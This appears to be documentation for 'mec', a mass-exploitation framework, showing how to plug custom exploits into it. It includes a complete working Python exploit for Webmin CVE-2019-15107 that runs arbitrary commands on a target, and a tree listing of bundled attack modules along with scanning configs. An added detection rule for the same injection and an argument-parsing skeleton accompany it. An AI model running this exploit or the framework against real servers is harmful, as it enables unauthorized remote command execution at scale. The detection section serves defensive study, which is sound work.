Custom Exploits
```shell
ls ./exploits/your-custom-exploit/
your-exploit-executable your-other-files
```
```python
#!/usr/bin/python3
# pylint: disable=invalid-name, line-too-long, import-error, no-member, missing-docstring, broad-except
'''
webmin_CVE_2019_15107
'''
import argparse
import re
import sys
import requests
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()


def CVE_2019_15107(url, cmd):
    '''
    exp
    '''
    vuln_url = url + "/password_change.cgi"
    headers = {
        'Accept-Encoding': "gzip, deflate",
        'Accept': "*/*",
        'Accept-Language': "en",
        'User-Agent': "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
        'Connection': "close",
        'Cookie': "redirect=1; testing=1; sid=x; sessiontest=1",
        'Referer': "%s/session_login.cgi" % url,
        'Content-Type': "application/x-www-form-urlencoded",
        # Content-Length is left for requests to compute: a hard-coded value is
        # wrong for every cmd that changes the body length
        'cache-control': "no-cache"
    }
    payload = "user=rootxx&pam=&expired=2&old=test|%s&new1=test2&new2=test2" % cmd
    r = requests.post(url=vuln_url, headers=headers,
                      data=payload, verify=False)
    if r.status_code == 200 and "The current password is " in r.text:
        print("\nvuln_url= %s" % vuln_url)
        m = re.compile(
            r"<center><h3>Failed to change password : The current password is incorrect(.*)</h3></center>", re.DOTALL)
        # match against the decoded text: a str pattern cannot be applied to r.content (bytes)
        cmd_result = m.findall(r.text)[0]
        print()
        print("Command Result = %s" % cmd_result)
    else:
        print("No Vuln Exist!")


parser = argparse.ArgumentParser(description='webmin_CVE_2019_15107')
parser.add_argument('-c', type=str, required=True,
                    help='command to execute on the target')
parser.add_argument('-t', type=str, required=True,
                    help='target url')
args = parser.parse_args()
try:
    CMD = args.c
    URL = "http://" + args.t
    CVE_2019_15107(URL, CMD)
except (KeyboardInterrupt, EOFError, SystemExit):
    sys.exit(0)
```
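The request the script above sends is easy to recognise on the receiving side: a POST to `password_change.cgi` whose `old` form field carries a shell metacharacter. The following is an added detection example (not part of mec or of the exploit above) that flags such requests in a list of constructed `(method, path, body)` records; the metacharacter set and the sample requests are assumptions, the path and field name come from the script.

```python
"""
Added example (not mec's own code): flag form posts that match the
password_change.cgi injection pattern used by the Webmin CVE-2019-15107 script.
"""
from urllib.parse import parse_qs, urlsplit

# Characters that have no business in a password field; the exploit above
# uses '|', the rest are assumed here to catch trivial variations.
SHELL_META = set("|;&`$")


def is_password_change_injection(method, path, body):
    """Return True when a POST targets password_change.cgi and its 'old'
    field (the one the exploit injects into) contains a shell metacharacter.
    The query string is ignored and the body is URL-decoded before checking,
    so 'pw%7Cid' is treated the same as 'pw|id'."""
    if method.upper() != "POST":
        return False
    if not urlsplit(path).path.endswith("/password_change.cgi"):
        return False
    params = parse_qs(body, keep_blank_values=True)
    return any(any(ch in SHELL_META for ch in value)
               for value in params.get("old", []))


# Constructed sample requests; the second mirrors the payload shape of the script above.
SAMPLE_REQUESTS = [
    ("POST", "/password_change.cgi",
     "user=alice&pam=&expired=0&old=Winter2019&new1=Spring2020&new2=Spring2020"),
    ("POST", "/password_change.cgi",
     "user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2"),
    ("GET", "/session_login.cgi", ""),
    ("POST", "/password_change.cgi?x=1",
     "user=bob&old=pw%7Cid&new1=a&new2=a"),
]


def scan(records):
    """Return the indices of records that look like injection attempts."""
    return [i for i, (method, path, body) in enumerate(records)
            if is_password_change_injection(method, path, body)]


if __name__ == "__main__":
    for idx in scan(SAMPLE_REQUESTS):
        print("suspicious request #%d: %r" % (idx, SAMPLE_REQUESTS[idx]))
```

A legitimate password change never needs these characters in the old password, so the rule has a low false-positive rate; pair it with the response marker the script checks for (`The current password is incorrect`) if response bodies are logged.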
In this demo, you can see that mec simply passes `target_ip` as the last argument:

```python
parser.add_argument('-t', type=str, required=True,
                    help='target url')
```

Note that mec passes `-t <target>` to your exploit, so when your exploit gets executed by mec, its command line looks like:

```shell
./exploit <custom args> -t <target ip>
```
├── conf
│ ├── censys.conf
│ └── zoomeye.conf
├── data
│ ├── ip_list.txt
│ ├── proxy.conf
│ ├── ss.json
│ └── zoomeye-login.action.txt
├── exploits
│ ├── ssh-bruteforce
│ ├── test
│ ├── weblogic
│ ├── webmin
│ └── witbe
├── install.py
├── lib
│ ├── cli
│ ├── __init__.py
│ ├── __pycache__
│ └── tools
├── LICENSE
├── mec
├── mec.py
├── output
│ └── result.txt
├── README.md
├── requirements.txt
├── screenshot
│ ├── main.jpg
│ └── zoomeye.jpg
└── tools
├── geckodriver
└── ss-proxy
Your custom exploits live under `./exploits`, just like any built-in ones. Take a look at the `test` exploit:
```
├── ssh-bruteforce
│   └── ssh_bruteforce.py
├── test
│   └── test
├── weblogic
│   └── weblogic_cve-2017-10271.py
├── webmin
│   └── webmin.py
└── witbe
    └── witbe.py
```
`./exploits/test/test` is the exploit. You can view all available exploits by issuing the `exploits` command in mec. Remember to `chmod +x <your exploit>`, otherwise it won't be recognized:
```
mec > exploits
[+] Available exploits:
webmin/webmin.py
test/test
witbe/witbe.py
weblogic/weblogic_cve-2017-10271.py
ssh-bruteforce/ssh_bruteforce.py
```
mec enters the target exploit's directory before launching a mass-exploit job, so relative paths are allowed: the exploit's root directory does not change while mec is using it.

Your exploit can be either a binary or a script, as long as you `chmod +x` it first. Before launching a mass-exploit job, you will see a warning reminding you how your exploit is going to be executed:

```
[!] DEBUG: ['./ssh_bruteforce.py', '/tmp/1', 'id', '-t']
Working in /home/u/.mec/exploits/ssh-bruteforce
[?] Proceed? [y/n]
```
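The two conventions described above (custom arguments first, `-t <target>` appended last, working directory set to the exploit's own folder) are all a custom exploit has to honour. The following is an added skeleton, not mec's own code and not one of the bundled exploits, showing how to split mec's argument vector with `argparse.parse_known_args` so that only `-t` is interpreted and everything else is handed back untouched; the `--timeout` argument and the sample target are constructed for illustration.

```python
#!/usr/bin/env python3
"""
Added example (not mec's own code): argument handling for a custom exploit
launched by mec as  ./exploit <custom args> -t <target>.
"""
import argparse
import os
import sys


def parse_mec_args(argv):
    """Split argv into (custom_args, target).

    mec appends '-t <target>' after whatever custom arguments were configured,
    so only '-t' is parsed here; unknown options and positionals are returned
    as-is for the exploit's own parser.  Raises ValueError if '-t' is missing,
    which means the script was not started the way mec starts it."""
    parser = argparse.ArgumentParser(add_help=False)
    parser.add_argument('-t', dest='target', default=None,
                        help='target, appended by mec as the last argument')
    known, custom = parser.parse_known_args(argv)
    if known.target is None:
        raise ValueError("no -t <target> given; mec always appends one")
    return custom, known.target


def is_executable(path):
    """mec only lists exploits that carry the executable bit (see 'chmod +x' above)."""
    return os.path.isfile(path) and os.access(path, os.X_OK)


def resolve_local(relative_path):
    """Resolve a path against the exploit's own directory.  mec chdir()s there
    before launching, but anchoring on __file__ makes manual runs behave the same."""
    base = os.path.dirname(os.path.abspath(__file__))
    return os.path.normpath(os.path.join(base, relative_path))


def main(argv):
    custom, target = parse_mec_args(argv)
    # Hypothetical custom option, parsed by the exploit itself from what mec passed through
    own = argparse.ArgumentParser()
    own.add_argument('--timeout', type=int, default=10)
    opts = own.parse_args(custom)
    print("target=%s timeout=%d config=%s" % (target, opts.timeout, resolve_local("config.txt")))
    return 0


if __name__ == "__main__":
    # e.g. mec would run:  ./exploit --timeout 5 -t 192.0.2.10   (constructed values)
    sys.exit(main(sys.argv[1:]))
```

Because `parse_known_args` does not reject options it does not know, the same script keeps working when you add custom arguments in mec's configuration without touching the `-t` handling.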
- If you have any issues, please report them to https://github.com/jm33-m0/mec/issues
- Open a pull request when you have fixed any bugs or added any features
- I would appreciate you adding your own adapted exploits to this repo